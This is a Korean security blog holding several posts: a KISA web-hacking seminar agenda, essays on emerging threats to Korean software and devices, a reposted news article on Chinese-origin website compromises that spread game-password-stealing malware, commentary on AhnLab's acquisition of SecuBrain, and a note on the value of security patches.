- 13:10~13:50 : 최근 해킹 대응 및 향후 보안대책 (NHN 전상훈 과장)
- 13:50~14:30 : 홈페이지 개발 시 보안 대책 (KISA 정현철 선임)
- 14:30~15:10 : 웹 취약점 사전 점검 방법 및 사례 (패닉시큐리티 신용재 사장)
- 15:10~15:40 : Coffee Break
- 15:40~16:20 : 웹 보안 기술 및 대응 방안 (듀얼시큐어 백진호 이사)
- 16:20~17:00 : 최신 중국 해킹기법 및 해킹 시연 (대학연합 해킹/보안 컨퍼런스 PADOCON 최상명)
- 17:00~18:00 : 패널토의 - 향후 웹 해킹 대응 방안 (발표자 전원)
※ 세부일정은 변동될 수 있습니다.

o 세미나 사전신청

http://www.kisa.or.kr/news/2005/announce_20051004.html

 

Posted by 바다란

댓글을 달아 주세요

 

유비쿼터스 환경에 다가오는 위협

국내개발 Application들도 더 이상 안전지대가 될 수 없다


* 2005년 3월에 외부웹 사이트에 올린 글이네요.. ^^; 참고 삼아 물론 내용은 지금도 그대로 이어지는 내용입니다. 현재의 문제점들이 Application의 문제라면 개발된 단편화된 Application 뿐 아니라 웹 과 DB가 연동되는 모든 부분에서 현재는 문제가 발견이 되고 있죠. 앞으로 가야할 길이 많이 남았습니다. 국가전체적으로 본다면 더더욱... 작년 3월에 쓴 글인데..지금과는 얼마나 연관 되는지 또 얼마나 차이가 있는지도 염두에 두시면 재밌을 것 같네요.


안녕하세요. 버그트랙 메일링을 보던 중 samsung 장비에 대한 문제점을 기술한 내용이 있네요. 앞으로 이런 부분을 커버할려면 많이 고생할 듯 싶네요. 메일을 보면서 느낀 점이 있어서 간단히 써봤습니다.


가능성 측면에서 생각을 해보시면 될 듯 싶습니다. 앞으로의 유비쿼터스 환경에서의 발전에 따른 문제들도 계속 되겠죠. ^^; (다른 곳에도 올린 글 중복해서 올립니다. 관심 있는 분들만)



 

취약성에 대한 향후 발전방향 및 예상에 대해 간략한 의견을 말씀 드리겠습니다.


국내 바이러스 백신에 대한 evasion 및 공격 코드가 추가된 웜/바이러스 유형이 출현 한데 이어 하드웨어 및 네트워크 장비에 대한 문제점들이 노출되어 공격이 발생하고 있습니다.


2005년 3월에 발표된 samsung adsl 모뎀에 대한 Default 다운로드의 경우도 상당히 어

##########0*

 

이없는 버그라고 할 수 있겠죠. 더불어 신규로 출현하는 웜에서는 기존 외국회사들의 백신만을 evasion 하고 종료시키는 코드에서 한국내의 백신벤더에 대한 공격코드도 추가 되어 있습니다.


이것은 한국을 공격의 전진베이스로 이용하고 다수의 사용자가 여전히 보안에 취약한 형태인 것을 이용한다는 것을 시사하고 있습니다. 한국을 바이러스 및 웜 전파의 중요한 숙주로 여긴다는 것이죠.


예전 기억을 더듬어보면 2~3년 전쯤에 모 백신회사의 게이트웨이 시스템(일명 바이러스 월)에 대해 root 권한 획득이 가능한 설정상의 오류가 발생되어 긴급하게 패치가 된 것을 볼 수가 있었는데, 국내 제품들이 외국에 다수 알려지고 또한 하드웨어 및 네트워크 장비에 대한 수출 이 진행됨에 따라 문제점이 다수 발견되고 있습니다.


현재까지는 극히 미미합니다. 이 의미는 향후에 급증할 요소가 많다는 점을 이야기하고 있기도 합니다.


security 취약성의 발견 원칙은 가장 간단합니다. ‘가장 많이 사용하는 제품의 취약성을 발견하라, 그리고 그 파급력을 이용하라’입니다.


그동안 국내 vendor 및 제품에 대한 취약성 권고안은 거의 없었습니다. 왜냐하면 알려진 제품이 없었기 때문이죠. 그리고 그럴 가치도 없었구요. 향후에는 좀 더 다르게 진행이 될 것으로 보입니다.


발전을 함에 따라 또 변화를 추구함에 따라 Closed된 네트워크 환경에서 Open된 네트워크 환경으로 전환할 수밖에 없고 공개가 될 수밖에 없습니다. 즉, 국내의 시장에만 한주해서는 기업의 규모를 유주할 수 없는 상황이 전개가 됨으로 인해 국외의 시장에 필연적으로 진출을 해야 하며 이에 따라 Open된 네트워크 환경으로 모습을 나타내는 것이 반드시 필요한 과정이 됩니다.


소프트웨어에 대한 공격도 증가하고 있고 또한 하드웨어 베이스의 제품에 대한 공격도 증가하고 있습니다. 하드웨어 Applience 제품군에 대한 공격도 점차 증가할 것으로 보이는데 지금껏 발견된 국내 취약성은 어이없는 코딩상의 오류 등에 의한 취약성이 대부분 이였고 점차 시일이 지나고 인지도가 높아질수록 고수준의 권한획득 공격들이 출현할 것입니다.


취약성을 발견하는 동향을 살펴보면 해외 전체로도 고수들의 활동은 적습니다. 적다기 보다는 기존의 운영체제에서 발견될 만한 큰 취약성들은 발견이 되었고 큰 영향을 미치는 Mega-vulnerability는 연 2~3회 정도로 줄어들 것 같습니다. 새로운 운영체제나 트렌드가 변화한다면 또다시 발견횟수가 늘어나겠지만 기존의 알려진 문제들은 대폭 줄어들 것입니다.


취약성의 발견에 따른 흐름을 보면 2003년이 피크였고 작년을 기점으로 운영체제에 대한 큰 이슈는 줄어들었는데 이와 같은 현상은 소스코드 검증 및 Application 진단의 상시화에 따른 것으로 보입니다.


2004년부터의 동향으로는 개별 Application에 대한 취약성 발견 동향이 큰 폭으로 증가하고 있습니다.


현재 신규보고 되는 취약성의 경우 하루에도 몇 백 개씩 발표되는 Application 제품들에 대한 취약성이 주로 발견되고 있어서 특정 제품을 사용하거나 특정 국가에 한정되어 사용되는 제품에 한해 큰 영향을 미치고 있습니다.


현재까지는 유럽권역과 미주권역에 사용되고 있는 상용 application에 대한 취약성 발견 비율이 상대적으로 높은데 향후 아시아 권역 특히 우리나라 제품군에 대한 영향이 매우 확대될 것으로 보입니다.


서두에서 말씀 드렸듯이 초고속 인프라가 고도로 활성화된 구조자체가 가장 큰 매력을

##########1*

 

지니고 있기 때문에 전진기지로서 매우 가치가 높기 때문이며, 휴대폰의 보급이 활성화 될수록, IT가 결합된 컨버젼스 제품 판매가 호조를 보일수록, 더욱 가치 있는 인프라이자 가장 좋은 테스트베드이기 때문입니다.


가까운 예로 zeroboard에 대한 취약성을 예로 들 수 있겠습니다. Application의 취약성을 찾는 그룹이 큰 폭으로 증가를 하였으나 기존의 OS나 가장 보고가 많았던 Application의 경우 많은 시도에 따른 보완이 이루어져 문제점이 적은 반면 신규로 발생하거나 그동안 잘 알려지지 않았던 Application의 경우 기본적인 취약성이 다수 존재하므로 쉬운 대상을 찾아서 이동하고 있습니다.


현재 국내 사이트에 대한 Defacement 동향을 보아도 국내의 해킹 피해 사례는 zeroboard 와 PHP Application 취약성을 이용한 도메인 서버 해킹 그리고 Webdav를 이용한 PUSH method를 이용하여 임의의 파일 push가 대다수입니다.


백신에 대한 공격증가도 향후 국제화가 될수록 더욱 커질 것으로 보입니다. 지금껏 공격이 없었던 것은 취약성이 없어서가 아니라 정확하게는 유명세도 없고 로컬화 된 제품이기 때문에 가치가 없어서 하지 않은 것이지만 많은 Defacement 그룹들이 신규 취약성을 발견하고 직접 공격을 수행하고 있어서 향후 큰 폭 증가가 예상됩니다.


더욱이 우려하고 있는 바로는 디지털 컨버젼스와 관련하여 다수의 제품군에 IT 기반이 접목되는 환경에서 더욱 크게 위협이 점증할 것으로 봅니다. 향후 5년 이내에 직접적으로 가시화 될 것입니다. 유비쿼터스의 경우도 동일하게 적용이 될 것입니다. 휴대폰을 이용한 위협의 내용은 2~3년 이내에 대중화 된 위협으로 나타날 것으로 봅니다.


예전에 작성했던 국가 기반시설에 대한 문서에 기술했던 내용들이 더욱 빠르게 다가 올 것입니다. 그때 그 문서를 만들면서 향후 3~5년 이후에 나타날 것이라 예상했는데 조금 더 기간이 연장되어  맞아 들어갈 것 같습니다.

(http://www.securitymap.net/sdm/docs/general/Critical_Alert_for_Cyber_Terror.pdf )


인터넷이 가능한 냉장고, 인터넷을 이용한 가스 조작 및 검침 , 언제 어디서나 제어가 가능한 모든 머신들과 시스템 , 교통통제 시스템 등이 부분적이라도 오픈되어지는 환경에서부터 소프트웨어적인 문제 이외에 하드웨어적인 장비에 대한 문제에까지 공격을 시도하게 될 것이고, 직접 피해를 입힐 것으로 보입니다. 물론 최악의 상황을 예상하면 이렇습니다.


embedded 운영체제도 기본 로컬의 활동이외에 외부와 연결되는 네트워크 부분이 연결되어 활성화 되는 시점부터 문제는 더욱 리얼하게 다가올 것으로 보입니다.


현재 발생되고 발견되고 있는 Bot 관련 공격 경로에 OS 및 유명 Application에 대한 공격 이외에도 특정 취약성이 존재하는 무료 혹은 상용 Application에 대한 공격도 추가가 되어 있고 향후 발생된 모든 문제점들이 결합되는 구조로 나아갈 수 있을 것입니다. Monster-bot은 앞으로도 계속 진화할 것이고 유비쿼터스 환경에서도 위협은 여전할 것입니다.


피부에는 상당히 느리게 다가오지만 움직임은 상당히 빠릅니다. 또 그것에 대한 예측도 선행이 되어야 하고 부족한 부분에 대한 고려는 항상 존재해야만 합니다. 위협을 과대해석해도 안되지만 덮어놓고 가는 것은 더욱 큰 문제라고 생각합니다.


국가적 성장동력원인 IT제품이 대외적으로 활성화 되고 수출이 보편화 될수록 또 컨버젼스가 빠르게 이루어질수록 위협이 급증하게 된다는 점 하나와 국내의 수많은 개발 Application들도 더 이상 안전지대가 될 수 없다는 점입니다. 그동안 여유 없이 앞만 보고 달려 왔는데 기업의 연속성에 영향을 줄만큼의 위험 요소가 향후에는 존재할 것이라는 예상을 분명히 할 수 있을 것 같습니다.


언제나 의견 있으시면 의견 주십시오. ^^;


  p4ssionable security expert!

  * E-mail: winsnort@cqrity.net , p4ssion@gmail.com



ⓒ 바다란

Posted by 바다란

댓글을 달아 주세요

기사에서 밝힌 것은 작게 축소해서 본 부분입니다.

실제로는 validation 체크가 안된 사이트는 국내 사이트의 2/3이상일 것입니다. 또한 이중에서 직접 해킹이 가능한 서버가 절반정도 될 것이구요.

앞으로도 계속될 사안입니다.

 

 

[머니투데이 성연광 기자]

"대한민국 인터넷 보안에 심각한 구멍이 뚫렸다"

유수 웹사이트를 해킹해 악성코드 유포지로 악용하는 신종해킹수법(일명 '중국發 해킹')을 두고 한 말이다.

지난 5월 한국MSN, 코리아닷컴 등 쟁쟁한 국내 상당수 인터넷 사이트들이 연이어 중국發 해킹에 당해 온라인 게임사용자의 아이디와 비밀번호를 노리는 악성코드가 유포되는 신종 해킹 사건이 터지면서 국내 인터넷보안의 최대 이슈로 대두된 지 반년이 다됐다.

당시부터 정부기관과 민간 보안업계가 이에 대한 권고문, 취약점 진단서비스 등 대책 마련에 나서고 있지만, 언론사 뉴스포털, 케이블방송, 심지어는 국가연구기관까지 가릴것없이 연일 중국발 해킹에 속수무책으로 당하고 있다. 지난 6월부터 현재까지 중국발 해킹수법에 당해 한국정보보호진흥원(KISA)에 공식 집계된 국내 사이트 수만 이미 1000여곳을 넘어섰다.

전문가들은 "자칫 방심했다가는 과거 1.25대란보다 더욱 큰 보안사고에 직면할 수 있다"고 경고하고 있다. 2003년 1.25대란의 경우, 일시적인 네트워크 소통 마비 정도에 국한됐지만, 이번 중국發 해킹수법의 경우, 위협적인 악성코드를 보다 광범위하고 은밀하게 유포시킬 수 있다는 점에서 훨씬 위험하다는 게 이들의 지적이다. 무엇보다 1.25대란의 경우, 근본적인 처방이 가능했지만, 이번 신종해킹수법의 경우, 아직까지 이렇다할 국가차원의 대응책이 없다는 게 큰 문제다.

◇점점 대담해지는 중국發 해킹

지난 6개월 사이 중국발 해킹에 대한 국내 보안대책은 여전히 제자리를 맴돌았던 반면, 공격자들의 수법은 빠른 속도로 교묘해지고 있다. 무엇보다 공격자들의 해킹방식이 보다 용이주도해졌다. 얼마전까지만 해도 보안이 취약한 웹사이트들을 무작위적으로 공격하던 방식에서 벗어나 최근에는 방문자수가 많거나 많을 것으로 추정되는 특정 분야의 웹사이트들을 순차적으로 공격하고 있다.

뉴스포털과 케이블방송이 대표적이다. 네이트닷컴 뉴스포털과 오마이뉴스, 스포츠조선 등 주요 뉴스 사이트들이 일제히 공격을 받은데 이어 최근에는 모 지상파 방송 한곳과 경제일간지도 같은 피해를 입은 것으로 알려졌다.

지난달에는 엠넷, 홈CGV, 내셔널지오그래픽, XTM 등 주요 케이블방송들과 교육방송(EBS) 등 방송 미디어들이 줄줄이 공격받았다.

악성코드를 유포하는 수법 또한 보다 지능화되고 있다. 7월 모 보안업체 웹사이트에 유포된 악성코드의 경우, 감염된 사용자 PC에 만들어진 실행파일 아이콘이 이 회사에서 배포하는 스파이웨어 퇴치 프로그램을 흉내내 제작됐다. 심지어는 온라인 게임에서 기본적으로 깔아주는 키보드 방지 프로그램명을 흉내낸 악성코드도 발견됐다.

지난 9월 모 만화 케이블방송사의 경우, 공격자는 기존 익스플로러 브라우저의 취약점을 이용한 유포방법 대신 액티브 엑스(Active X)를 이용했다. 또 게임 사용자 정보를 빼내는 악성코드는 미디어 웹사이트에서 흔히 내려받을 수 있는 '플래시' 파일로 위장됐다. 이처럼 교묘히 사용자들을 속이기 시작한 것이다.

과거엔 사용자의 온라인 게임 아이디와 비밀번호를 훔쳐내는 트로이목마가 주로 유포됐으나, 최근에는 해커가 사용자 PC에 직접 접속해 정보를 빼갈 수 있는 백도어와 애드웨어도 같은 방식으로 유포되고 있다. 지난달 해킹을 당한 한국전자통신연구원 게임기술지원센터(ETRI GTSC) 사이트에도 온라인 게임정보 탈취용 트로이목마와 함께 백도어가 발견됐으며, O사 미디어 관련 사이트에서는 중국 애드웨어가 유포된 바 있다.

◇악성코드 탐지도 어렵다

이뿐 아니다. 악성코드도 기존 보안제품이 탐지하기 어렵게 만들어지고 있다. 초기 해킹당한 사이트에 검출된 악성코드의 경우, 대부분의 백신제품들이 이를 탐지해냈으나, 최근에는 어느 백신제품으로나 탐지가 어렵게 제작돼 있다. 공격자들이 계속해서 변종을 만들어내기 때문이다.

악성코드를 숨겨놓는 일명 '숙주서버' 해킹도 갈수록 교묘해지고 있다. 숙주서버란 공격자가 자신을 노출시키 않기 위해 또다른 웹 서버를 해킹에 악성코드를 몰래 숨겨놓는 곳을 말한다.

최근에는 국내 보안이 허술한 중소 웹사이트뿐만 아니라 중국 현지 사이트, 심지어는 멀리 독일에 소재한 사이트까지 해킹해 몰래 숨겨놓고 있다. 해외에 소재한 사이트의 경우, 우리나라 보안당국이 이를 제거하기 쉽지 않다는 점을 노린 것이다.

◇피해 규모는 상상초월할 듯

아직까지 공식적인 피해규모는 발표되지 않았다. 그러나 중국발 해킹과 악성코드 유포방법이 갈수록 은밀해지다보니, 의외로 그 피해규모가 상상을 초월할 수 있다는 지적이다.

실제, 지난달 KISA가 악성코드가 숨겨져 있는 숙주 서버를 분석한 결과, 한곳에서만 1000여명 이상이 악성코드를 받아간 것으로 알려졌다. 현재 이같은 숙주서버만 수백개가 있다. 물론 보안패치가 완료된 사용자 PC에선 실행되지 않지만, 적잖은 네티즌들이 실제적인 피해를 본 것으로 추정된다. 최신 보안패치 적용률이 상대적으로 미미하기 때문이다.

또 올들어 국내 온라인 게임 아이템 거래를 둘러싼 한중 조직간 불법 커넥션이 실제 두차례나 적발된데다, 한국 게이머들을 겨냥한 중국발 해킹이 갈수록 기승을 부리고 있다는 점에 비춰, 실제 이같은 공격이 효과가 있고, 이로인해 피해규모 또한 상당한 것으로 추정된다.

문제는 이같은 중국발 해킹피해가 장기화될 가능성이 높다는 것.

현재 중국발 해킹수법이 방화벽, 침입탐지시스템(IDS) 등으로 방어가 불가능한 웹 애플리케이션의 취약점을 이용하는데, 상당수 국내 웹사이트들이 이같은 취약점에 그대로 노출돼 있는 것으로 지적됐다.

NHN 보안담당자인 전상훈 과장은 "국내 웹사이트의 50% 이상이 이같은 웹 애플리케이션 취약점을 안고 있다"며 "이를 막기 위해선 개별 사이트마다 일일이 보안 체크(인자값 유효성 점검)을 해줘야하는데, 현실적으로 불가능하다"고 말했다.

또 현재까지 주로 국내 유명 온라인 게임 아이디와 비밀번호 유출을 목적으로 하고 있으나, 금융정보 등 앞으로 다른 중요 정보유출에 악용될 가능성도 크다는 게 전문가들의 지적이다.

보안업체인 지오트의 문종현 바이러스분석실장은 "현재 중국발 해킹은 기존 웹사이트 변조사고처럼 단순한 장난이나 실력과시 차원이 아닌, 금전취득과 직결되고 있다는 점에 유념해야한다"며 "인터넷 보안은 앞으로 인터넷서비스 운영업체뿐 아니라 인터넷을 사용하는 국민 스스로 재산을 지키는 필수요소로 이미 자리잡고 있다"고 지적했다.

성연광기자 saint@

Posted by 바다란

댓글을 달아 주세요

http://news.naver.com/news/read.php?mode=LSS2D&office_id=008&article_id=0000685301&section_id=105&section_id2=283&menu_id=105

 

안연구소의 시큐브레인 인수 관련 하여 우려와 기대를 동시에 보낸다.

 

안연구소의 인수에 대한 부분은 처음이 아니며 2001년 경에 한시큐어 인수를 통해 백신 보안 부분 및 PC 보안 부분이 아닌 다른 부분에 진출 하려 하였으나 결론적으로 실패를 한 적이 있다.

 

본인도 연관이 있었기에 지금에 인수 기사를 보며 그때 느꼈던 실패의 원인 및 문제점에 대해서 가급적 객관적으로 언급을 해보면 다음과 같다.

 

1. 과도한 제품 의존에 따른 업무 집중도 분산의 어려움 [ 백신 사업에 너무 편향이 되어 있어서 다른쪽으로의 에너지 전환이 어려운 상황]

 

2. 인식 부족 [ 피인수 업체는 보안관제 및 전반적인 보안 카테고리를 다루는 업체 였으나 백신이라는 카테고리 및 PC보안에 집중 하려는 의지에 따라 지원 및 인식 자체의 범위가 달랐다 ]

 

3. 인수 시점은 PC상의 바이러스에서 네트워크 단위의 웜이 최초 발견되는 전환 시기여서 굉장한 호기가 될 수 있는 시점이였으나 방향 전환을 못했다.

 

4. 백신 시장에의 안주 의지

 

5. 기타로 지금에서 보면 인원이 많지 않았으나 융화 할 수 없게 만드는 경직된 체계 및 의사소통 경로 부족도 들 수 있다. [ 관점에 따라 다를 수 있다.]

 

보는 관점에 따라서 다를 수 있으나 가장 큰 문제는 패러다임이 변화하는 시기에 유연하고 창의적으로 변화하지 못했다는 점과 중간 관리자들의 우유부단함에 의해 보안업체간의 최초 합병이면서도 시너지를 내지 못한 점이 가장 아쉬움으로 남는다.

 

Codered 웜이 최초 발견 되었을때 바이러스 백신 회사 및 네트워크 보안 회사 모두 방향성을 잡지 못한 혼돈의 시기 였는데 해당 시기에 명확한 비젼이 있고 실행의 의지가 있었다면 장족의 발전을 할 수도 있었을 것이다. 이 최초의 발전된 방식의 웜 이후 달라진 현상이 패러다임의 변화가 아니고 무엇인가?

 

백신회사는 해킹을 이용한 방식이므로 대응을 못한다는 논리이고 네트워크 보안 방식은 전파 방식이 바이러스에서 사용하는 형태라서 대응을 못한 부분이 있다.

이 codered 웜 이후에 줄줄이 여러가지 웜들이 발견 되었는데 그 당시에 전 세계 보안 분야의 이슈는 네트워크 보안 전문 업체 나 백신 전문 업체 모두 부족한 부분을 키우기 위해 인수합병에 가열찬 노력을 기울이는 계기가 되었다. 최소한 향후 발전을 위해 부족한 부분을 인식하고 준비하는 기간을 가진 것이라 할 수 있다.

명확한 패러다임의 변화 시기에 변화하지 못한 댓가는 누가 지불 해야 할까?

 

그래서 더 아쉬움이 남긴 하지만 지금까지 와는 다른 입지로..위기감을 지니고 [ 이미 지나버린 기회도 있으므로 ] 절박함으로 노력을 기울여야만 성공 할 수 있을 것이다.

서버보안이라는 것이 그리 쉽게 볼 수 있는 부분은 아니며 지속적인 노력이 필요하며 안연 내부에서도 변화를 위한 확고한 의지가 있고 노력이 실제화 되어야만 합병의 득을 얻어 새로운 성장 동력이 될 수 있다.

 

지금 분명히 안연구소는 위기 상황이며 바이러스 샘플로만 외국과 경쟁하는 시대는 이미 지나갔다. 모든 중요 이슈는 변화 하였으며 이제는 충분히 위기감을 받아 들이고 있을 것이다.

MS의 원캐어 서비스 및 무료 백신 서비스들은 차별화 되지 못하고 있는 안연구소 성장동력인 V3 및 스파이제로에 대해 심각한 위협이 될 것임은 자명하다. 그 시기는 너무나도 빨리 눈앞에 다가와서 종합보안 보다는 몇몇 부분에 특화되고 시너지를 낼 수 있는 보안 부분으로 나아가지 않는한 좌초는 명확해 보인다.

세계적으로 본다면 틈새산업에 진출하여야만 가능성이 있다. 이제와서 글로벌화된 체제를 완벽하게 갖춘 시만텍,맥아피,트렌드와 동종의 제품으로 세계시장에서 성공할 수 있을까?  힘들 것이다.

 

변화만이 나아갈 길이다. 5년전에도 그랬었지만 지금은 더욱 절박할 것이므로 안연구소 스스로가 더 잘 알 것이다.

 

- 한때 잠깐 머물렀던 사람

Posted by 바다란

댓글을 달아 주세요

새 밀레니엄을 맞이 한 것이 엊그제 같은데 벌써 10년 이라는 시간이 훌쩍 흘렀다.

세월의 흐름과 같이 기술의 발전도 폭을 같이하고 인터넷도 더 깊숙이 생활 속으로 들어왔다.

 

사람과 사람 사이를 이어주고 연결해주며 정보를 교환해주는 주된 통로 역할을 하며 가상의 현실을 실제로 가능하게 해주는 인터넷은 그 친밀성만큼 위험성을 항상 가지고 있었다. 친밀성이 더욱 높아지고 실제생활과도 밀접한 관련을 가지게끔 된 생활에서 위험요소는 이제 네트워크상에만 존재하는 위험이 아니다.

 

생활 구석구석 인터넷과 연관 되지 않은 부분을 찾는 것이 더 어렵고 전산화, 자동화 되지 않은 부분을 찾는 것이 더 어려울 정도다. 일반적인 인터넷 서핑 속에서도 생활 속에서도 전기, 가스, 발전, 문화, 전화 등등 모든 것은 연결 되어 있다. 더불어 위험들도 동일한 가치로 연결 되어 있다.

 

2010년의 시작을 전후 하여 1월이 채 가기도 전에 수많은 위험 관련 뉴스와 이슈의 홍수를 직면한다. 이미 시작은 오래 전부터 되어 왔던 것이고 지금에야 모습을 나타내는 것뿐이다. 정보를 얻기 위한 해킹, 권한을 획득하여 자료를 유출하고 내부망에 침입을 하는 백도어들.. 경쟁국가, 경쟁산업, 정치적 견해를 달리하는 집단에 대한 사보타지 등등.. 이쯤에 대량의 트래픽을 발생 시키는 DDos 공격 정도는 애교로 느껴질 정도다.

 

모든 보안회사들과 커뮤니티들은 앞다투어 스마트폰의 보안 위협과 DDos 공격을 가장 큰 위험으로 꼽는 보고서들을 연신 발표 하고 있다. 이미 예정된 것에 지나지 않는다. 이제는 좀 더 다른 방향에서 가치를 부여해야만 하고 관찰 해야만 한다.

 

기술에 능숙한 자는 기술의 관점에서만 사안을 바라보아서는 안 된다. 기술에 익숙한 자는 기술을 바탕으로 하여 세상의 변화를 볼 수 있어야 하고 지금과 같은 상황에서는 왜 국제관계에서 사이버전이 큰 이슈가 되고 있는지도 명확하게 알아야 한다. 그래야 새로움이 있고 예측이 가능해 진다. 눈에 보이는 예상은 실패할 가능성이 없는 정해진 사실일 뿐이다. 모두가 똑 같은 이야기를 한다. 그러나 이면을 통찰 하는 시야는 부족하다.

 

앞으로의 사이버 세상은 더 밀접해진 실생활을 대변하고 있고 세계 무대에서의 중심도 이전 보다는 더욱 더 밀접하게 연관되어 돌아가고 있다. 실생활에 충격적인 영향을 줄 수 있는 부분들도 사이버 세상을 통해서 거래가 되고 전달이 된다. 여기에 영향을 미치는 것은 실제 국제관계, 국가간의 관계도 차갑게 돌변 시킨다. 지금 미국과 중국의 사례를 보라. 서로간의 사이버전을 중재하자는 미국과 러시아의 협력을 보라. 미래 세상을 준비하기 위해 가장 중요한 점은 대응 능력이라는 점을 강하게 표방하고 있는 영악한 미국정부의 대응을 보라.

 

어디쯤에 와 있는가?

 

대량 공격이 일반화 되어 있고 작은 구멍으로도 전체가 공격을 받는다. 내부에 중요한 정보들은 겹겹이 둘러 쌓인 성곽에서 철통 같은 경비로 보관이 되고 있으나 모두가 정문만 철통같이 지킨다. 구중궁궐에 들어가는 방법은 정문이 아니라도 된다. 철통같이 비용을 들이고 인원을 늘려 보호를 한다 하여도 세상을 평안하게 하는 만큼의 태평성대는 구가하기 어렵다.  턱 밑에서 방심하기만을 기다리고 비수를 겨누는 지금의 상황에서는 언제든 털릴 수 밖에 없으리라.

 

자산은 다시 평가 되어야 한다. 중요한 정보를 담고 있는 곳을 데이터베이스라 하고 이 데이터베이스에 접근 할 수 있는 모든 장비와 서비스들은 단계별로 중요도를 다시 산정해야만 한다. 가지고 있는 정보에 의해 중요도를 평가하기도 하지만 여기에 덧붙여 접근 가능성에 따라 기술적인 보호조치들은 달라져야 한다.

 

TJMaxx 에 대한 해킹과 Heartland (한국으로 따지면 대규모 PG)의 정보 유출은 유효한 카드 일억 건 이상의 직접적인 유출이 있었다. 7/11의 내부망 침입 후 현금인출, F-35 설계도의 유출, 이란 사이버 아미라는 단체에 의한 트위터와 바이두의 DNS 변조사건들.. 오래된 일들이 아니다. 지금 이 순간에도 국내에서는 또 다른 문제들이 벌어지고 있고 언제든 수면위로 나타날 수 밖에 없다. 미국내 서른개가 넘는 주요 회사들에 대한 타켓화된 공격은 이미 오래 된 이야기 이다. 다만 대상 영역이 민간부분까지 대폭 확대된 경향이 변화되었을 뿐이다. 제로데이 공격이라는 말의 역사는 최소 5년 이전에 발생된 말이며 오늘 당장 나온 용어가 아님을 잊지마라.

 

종래에는 모든 PC를 포기하는 정책이 나올지도 모르겠다. 모든 PC들은 껍데기이고 중앙에서 통제하는 형태로 진행이 될 수도 있다. Network computer의 꿈은 아직 끝나지 않았다. 비록 바람직한 방향에서의 접근이 아니라 어쩔 수 없는 선택이라는 방안이겠지만.. 적극적인 보호는 공조가 안되어 힘들고 제약들이 많다. 수동적인 보호는 아무리 걸어 잠근다 하여도 한 순간의 헛점들이 전체를 위태롭게 만든다. 그 헛점들은 항상 출현하게 마련이다.

 

개인PC에는 더 이상 개인적인 자료를 담을 수 없다. 신뢰할 수 없는 인터넷의 위기는 앞으로도 더 확산이 될 것이고 더 충격적인 모습으로 영향을 미치게 될 것이다.

 

어쩌면 인류역사상 인간의 지적능력의 진보와 정보 획득 수준을 최대치로 확장케 해준 인터넷은 가장 유용한 도구이며 한 단계 이상을 인류 전체의 지식과 인식체계를 개선 시킬 수 있는 가능성을 지녔다고 할 수 있다. 그러나 현재는 오염 되어 가고 있다. 권력을 쥔 자들은 도구의 활용이 극대화 되기를 두려워할 수도 있을 것이다. 모든 것이 공개되고 비밀은 사라져 가게 되고 권력자들의 입지는 좁아지게 된다. 그래서 오염으로 방치 하는 것일 수도 있다.

 

방치 하기에는 주어진 기회가 너무 아깝고 안타깝다.

사람과 사람 사이를 더 가깝게 만들지 못하는 인터넷, 불신을 초래하는 문화, 지식 수준은 극도로 확장이 되어 버스를 타나, 지하철을 타나 몰입하게 만든다. 방향성을 제대로 잡으면 큰 도움이 되는 도구가 될 수 있으나 그렇지 않다면 손쉽게 나락으로 떨어져 간다.

 

세상을 이롭게 만드는 도구로서 충실하도록 하려면 적극적인 대응이 필요하고 뜻 있는 자들의 모임도 필수적이다. 또한 한 국가에서 시작을 한다면 향후의 새로운 분야에서의 입지도 강화 될 수 밖에 없을 것이다.  세상을 널리 이롭게 하려면 무엇을 해야 하는지부터 생각을 해야 할 것이고 가깝게는 위험을 회피 하려 하기 보다는 근본적인 문제를 없애려고 노력해야 한다. 무엇이 핵심적인 문제인지를 파악 하는 것이 제일 먼저 이겠지만..

 

 

지금의 핵심 문제는 무엇인가?

 

 

개인PC에 대한 해킹이라는 의미는 운영체제의 권한을 획득하여 자유자재로 활용한다는 용어와 동일하다. 개인 PC에 대한 해킹을 하기 위해 타켓화된 공격을 감행하고 인터넷을 통해 감염을 시킨다. 대량으로 감염이 된 PC들은 또 다른 이득과 목적을 위해 이리저리 이용 당한다.

 

사이버 세상을 클린 하게 만들려면 지금의 관점에서 보다 더 장기적인 관점으로 접근을 해야 한다. 당장 눈 앞의 일에 연연해서는 큰 방향성을 잡을 수가 없다. 이슈가 되는 것만을 해결 하기 위해 따라가는 것은 어쩌면 당연한 현상일 수 밖에 없다. 그러나 중심이 없다. 어떤 문제를 해결 하는 것이 가장 먼저이고 그 문제 해결을 위해 어떤 작업들을 순차적으로 해야 하는지에 대한 로드맵이 없다.

 

이버 경우도 현상의 문제만을 기술하고 해결 하기 위한 프로세스, 지원, 방향들을 담았을 뿐이다. 근본적으로 클린한 순방향 도구의 인터넷으로 전환, 확대 시키기 위한 방안으로 언급 된 것은 아니다.

 

변화하는 인터넷의 위협들은 이제 실생활 구석구석까지 난입한다. 이제 그 실체도 확인을 해보기 바란다.

 

-       바다란 세상 가장 낮은 곳의 또 다른 이름.

 

 

 

Posted by 바다란

댓글을 달아 주세요

2002년 8월로 되어 있네요.

 

문서를 찾아서 다시 읽어 보니 부끄러움만..부족함도 많고..

 

그때 브라질 해킹 그룹을 분석하게 된 계기가 내부로 부터 눈을 돌려 외부를 분석하고 그때 당시만 해도 국내의 웹사이트를 공격하는 다수의 고급 크래커들이 브라질 계열이다 보니 적을 알고자 하는 마음으로 분석을 했었죠. 덕분에 새로운 정보 수집 사이트도 찾고 여러 동향도 조금은 객관적으로 불 수 있었던 것 같습니다.

 

아마 해외 그룹에 대한 분석은 처음이 아니었을런지.. ^^; 뭐 얼치기 분석이라도.

 

이래저래 재밌게 보낸 2002년 이었네요. 돌이켜 보면.. 이걸 하루에 왕창 올리면서 이런 생각이 드니  참 세상은 그래도 살만 한가 봅니다. 몰입이란..열정이란.. 항상 이런 질문 하면서 사는데..

 

 

Posted by 바다란

댓글을 달아 주세요

보안패치의 중요성은 아무리 언급을 해도 지나치지 않습니다. 지난해 발생한 대부분의 사용자 정보를 탈취하기 위한 악성코드 대부분이 2 종류의 취약성을 이용하였고 올해 초에 나온 WMF 취약성을 이용한 악성코드도 있습니다. 즉 3 종류의 취약성만 선별하여 막았다면 많은 문제를 해결 할 수 있었다는 것이죠. 이런 점에서 의미를 생각해 볼만한 기사인 것 같습니다.

 

--------------------------------

 

“웜-악성코드, 윈도우 취약성 이용한 공격이 대부분”

윈도우 취약성 근본 원인제거 방법은 ‘보안패치’ 뿐


